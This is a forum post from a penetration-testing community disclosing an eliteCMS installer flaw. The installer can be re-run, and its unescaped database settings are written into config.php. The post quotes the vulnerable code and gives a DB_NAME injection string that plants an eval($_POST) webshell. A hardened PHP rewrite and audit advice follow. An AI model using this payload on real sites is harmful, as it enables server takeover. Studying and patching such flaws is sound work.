China Network Penetration Testing Alliance (中国网络渗透测试联盟)
Title: eliteCMS installer not verified + one-line webshell write vulnerability
Author: admin
Time: 2012-11-18 13:59
eliteCMS's installer is not locked after installation completes, so an attacker can re-run the installation by visiting the installer URL.

Another vulnerability is that the installer can write a one-line webshell directly into admin/includes/config.php.

Let's look at the code:
...

    // Installer step 4: generate admin/includes/config.php from the session values
    elseif ($_GET['step'] == "4") {
        $file = "../admin/includes/config.php";
        $write = "<?php\n";
        $write .= "/**\n";
        $write .= "*\n";
        $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
        ... (omitted) ...
        $write .= "*\n";
        $write .= "*/\n";
        $write .= "\n";
        // The session values are interpolated straight into PHP source text,
        // inside double-quoted string literals, with no escaping
        $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
        $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
        $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
        $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
        $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
        $write .= "if (!\$connection) {\n";
        $write .= " die(\"Database connection failed\" .mysql_error());\n";
        $write .= " \n";
        $write .= "} \n";
        $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
        $write .= "if (!\$db_select) {\n";
        $write .= " die(\"Database select failed\" .mysql_error());\n";
        $write .= " \n";
        $write .= "} \n";
        $write .= "?>\n";

        // The assembled text is then written to config.php
        $writer = fopen($file, 'w');
        ...
Now look at this code:

    // Earlier installer step: the POSTed values are copied into the session as-is
    $_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
    $_SESSION['DB_NAME'] = $_POST['DB_NAME'];
    $_SESSION['DB_USER'] = $_POST['DB_USER'];
    $_SESSION['DB_PASS'] = $_POST['DB_PASS'];
The values are taken without any validation.

If the database name POST data is set to:

    "?><?php eval($_POST[c]);?><?php

a one-line backdoor will be written to /admin/includes/config.php.
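As an added example (not code from eliteCMS or from this post), the following PHP shows how a defender would rewrite the step-4 config writer so that both issues described above are closed: an exclusive install lock file stops the installer from being re-run, each DB setting is checked against a conservative pattern before it is used, and every value is emitted through var_export() so it becomes a quoted PHP string literal instead of raw source text. The function names, the lock-file and config paths, and the validation patterns are assumptions chosen for illustration.

```php
<?php
// Added example, not eliteCMS code: a hardened replacement for the
// install-step-4 config writer. Function names, file paths and the
// validation rules below are assumptions for illustration.

declare(strict_types=1);

const INSTALL_LOCK = __DIR__ . '/install.lock';   // assumed lock path
const CONFIG_FILE  = __DIR__ . '/config.php';     // assumed target path

/**
 * Reject any value the installer should never accept for a DB setting.
 * Host, database name and user name are limited to a conservative
 * character set; the password is free-form but length-limited, because
 * it is never interpolated into code anyway.
 */
function validateDbSetting(string $key, string $value): string
{
    $limits = [
        'DB_SERVER' => '/^[A-Za-z0-9.\-:]{1,253}$/',
        'DB_NAME'   => '/^[A-Za-z0-9_]{1,64}$/',
        'DB_USER'   => '/^[A-Za-z0-9_.\-]{1,80}$/',
    ];
    if ($key === 'DB_PASS') {
        if (strlen($value) > 256) {
            throw new InvalidArgumentException('DB_PASS too long');
        }
        return $value;
    }
    if (!isset($limits[$key]) || !preg_match($limits[$key], $value)) {
        throw new InvalidArgumentException("Invalid value for $key");
    }
    return $value;
}

/**
 * Build the config.php contents. var_export() emits a quoted, escaped PHP
 * string literal, so a value containing ?> or <?php stays inside the
 * string and is never lexed as code. No closing ?> tag is emitted either.
 */
function renderConfig(array $settings): string
{
    $out = "<?php\n// Generated by the installer; do not edit by hand.\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $out .= sprintf("define(%s, %s);\n",
            var_export($key, true), var_export($settings[$key], true));
    }
    return $out;
}

/**
 * Validate, take the install lock, then write the config exactly once.
 * fopen(..., 'x') fails if the lock already exists, so two concurrent
 * requests cannot both get past this point.
 */
function writeConfigOnce(array $post): void
{
    $settings = [];
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $settings[$key] = validateDbSetting($key, (string)($post[$key] ?? ''));
    }

    $lock = @fopen(INSTALL_LOCK, 'x');
    if ($lock === false) {
        throw new RuntimeException('Installation already completed; installer is locked.');
    }
    fwrite($lock, date('c') . "\n");
    fclose($lock);

    // Write to a temp file and rename over the target so a half-written
    // config.php is never left in place.
    $tmp = CONFIG_FILE . '.tmp';
    if (file_put_contents($tmp, renderConfig($settings), LOCK_EX) === false
        || !rename($tmp, CONFIG_FILE)) {
        unlink(INSTALL_LOCK);   // undo the lock so a retry is possible
        throw new RuntimeException('Could not write config file');
    }
}

// Demonstration with constructed input. The injection string from the post
// is rejected by the DB_NAME pattern before any file is touched; even with a
// looser rule, var_export() would keep it inert inside a string literal.
$malicious = [
    'DB_SERVER' => 'localhost',
    'DB_NAME'   => '"?><?php eval($_POST[c]);?><?php',
    'DB_USER'   => 'elite',
    'DB_PASS'   => 'secret',
];
try {
    writeConfigOnce($malicious);
} catch (InvalidArgumentException $e) {
    echo "Rejected: ", $e->getMessage(), "\n";
}

// What the writer emits for a benign request (a password containing ?> is
// still just a string):
echo renderConfig([
    'DB_SERVER' => 'localhost', 'DB_NAME' => 'elitecms',
    'DB_USER'   => 'elite',     'DB_PASS' => 'p"ss?>word',
]);
```

The two controls are independent: the lock file alone would have stopped the re-installation path, and var_export() alone would have stopped the code injection even on the first run, so a deployment should keep both. Auditing an installed eliteCMS for this issue amounts to checking whether the install directory is still reachable and whether admin/includes/config.php contains anything other than the expected define() lines.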
Welcome to the China Network Penetration Testing Alliance (https://www.cobjon.com/)
Powered by Discuz! X3.2